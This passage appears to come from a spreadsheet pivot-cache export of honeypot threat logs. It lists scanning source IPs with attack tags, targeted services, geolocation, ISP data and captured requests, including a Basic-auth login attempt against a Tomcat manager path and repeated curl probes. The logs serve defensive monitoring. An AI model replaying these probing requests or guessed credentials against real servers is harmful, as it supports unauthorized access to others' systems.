    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3124:51bb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3817"/>
    <x v="3817"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T09:26:53"/>
    <d v="2025-02-22T05:43:48"/>
    <d v="2025-04-01T09:26:53"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="112"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="SC"/>
    <s v="Seychelles"/>
    <s v="16"/>
    <s v="La Rivière Anglaise"/>
    <s v="NA"/>
    <s v="Victoria"/>
    <s v="241131"/>
    <s v="NA"/>
    <s v="-4.62113"/>
    <s v="55.4522"/>
    <s v="401116"/>
    <s v="Nybula LLC"/>
    <s v="Nybula LLC"/>
    <s v="business"/>
    <s v="internet secuirty Nybula"/>
    <s v="2017-02-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en-US,en;q=0.5', 'Authorization': 'Basic OGhZVFNVRms6OGhZVFNVRms=', 'Connection': 'close,close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0', 'method': 'GET', 'uri': '/manager/html'}}&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4fb:7697"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3818"/>
    <x v="3818"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T09:20:02"/>
    <d v="2025-04-01T09:20:02"/>
    <d v="2025-04-01T09:20:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="VIETEL-AS-AP"/>
    <s v="Viettel Group"/>
    <s v="corporate"/>
    <s v="Viettel"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b40:c212"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3819"/>
    <x v="3819"/>
    <s v="NA&amp;&amp;125-228-163-67.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T09:13:33"/>
    <d v="2024-03-23T06:35:57"/>
    <d v="2025-04-01T09:13:33"/>
    <n v="3375"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H9&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_HTTP_H19&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;389&amp;&amp;443&amp;&amp;80&amp;&amp;445&amp;&amp;26819&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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7de4:a343"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3820"/>
    <x v="3820"/>
    <s v="NA&amp;&amp;30.89-10-251.nextgentel.com"/>
    <x v="0"/>
    <d v="2025-04-01T08:53:01"/>
    <d v="2025-01-08T22:48:29"/>
    <d v="2025-04-01T08:53:01"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NO"/>
    <s v="Norway"/>
    <s v="46"/>
    <s v="Vestland"/>
    <s v="Bergen"/>
    <s v="Sandsli (Fyllingsdalen)"/>
    <s v="6697345"/>
    <s v="5148"/>
    <s v="60.2917"/>
    <s v="5.28272"/>
    <s v="15659"/>
    <s v="NextGenTel AS"/>
    <s v="NextGenTel Network"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2006-06-29"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:590a:fb1e"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3821"/>
    <x v="3821"/>
    <s v="user219100164205.ucatv.ne.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T08:47:52"/>
    <d v="2025-01-29T19:08:44"/>
    <d v="2025-04-01T08:47:52"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-8111"/>
    <s v="35.6906"/>
    <s v="139.77"/>
    <s v="18274"/>
    <s v="Utsunomiya Cable TV Corporation"/>
    <s v="Utsunomiya Cable TV Corporation"/>
    <s v="residential"/>
    <s v="Utsunomiya Cable TV Corporation"/>
    <s v="None"/>
    <s v="JPNIC-NET-JP"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:db64:a4cd"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3822"/>
    <x v="3822"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T08:43:08"/>
    <d v="2025-04-01T08:43:08"/>
    <d v="2025-04-01T08:43:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehran"/>
    <s v="112931"/>
    <s v="NA"/>
    <s v="35.7355"/>
    <s v="51.4023"/>
    <s v="49100"/>
    <s v="IR-THR-PTE"/>
    <s v="Pishgaman Toseeh Ertebatat Company (Private Joint Stock)"/>
    <s v="corporate"/>
    <s v="Pishgaman Toseeh Ertebatat Company (Private Joint Stock)"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5ca:6df8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3823"/>
    <x v="3823"/>
    <s v="NA&amp;&amp;125-229-4-249.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T08:33:34"/>
    <d v="2023-12-03T07:50:00"/>
    <d v="2025-04-01T08:33:34"/>
    <n v="1125"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_VNC_H20&amp;&amp;SMA-LAB_SIP_H16&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_ORACLE_H21&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_IPP_H37&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;5900&amp;&amp;5060&amp;&amp;1080&amp;&amp;9100&amp;&amp;6379&amp;&amp;1521&amp;&amp;21&amp;&amp;631&amp;&amp;443&amp;&amp;1902&amp;&amp;20522&amp;&amp;36296&amp;&amp;11140&amp;&amp;16782"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:4f9"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3824"/>
    <x v="3824"/>
    <s v="125-228-119-130.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T08:18:15"/>
    <d v="2024-12-15T04:33:51"/>
    <d v="2025-04-01T08:18:15"/>
    <n v="369"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="23&amp;&amp;59844&amp;&amp;36480&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="Xindian District"/>
    <s v="1674828"/>
    <s v="NA"/>
    <s v="24.9601"/>
    <s v="121.539"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:7782"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3825"/>
    <x v="3825"/>
    <s v="122-117-4-165.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T07:57:45"/>
    <d v="2024-07-23T19:22:24"/>
    <d v="2025-04-01T07:57:45"/>
    <n v="1267"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;55518&amp;&amp;23&amp;&amp;80&amp;&amp;NA"/>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amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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7a75:4a5"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3826"/>
    <x v="3826"/>
    <s v="114-35-114-164.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T07:55:22"/>
    <d v="2024-04-15T14:15:20"/>
    <d v="2025-04-01T07:55:22"/>
    <n v="481"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;10569&amp;&amp;9100"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:72a4"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3827"/>
    <x v="3827"/>
    <s v="114-34-244-28.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T07:54:52"/>
    <d v="2024-09-08T01:38:00"/>
    <d v="2025-04-01T07:54:52"/>
    <n v="614"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
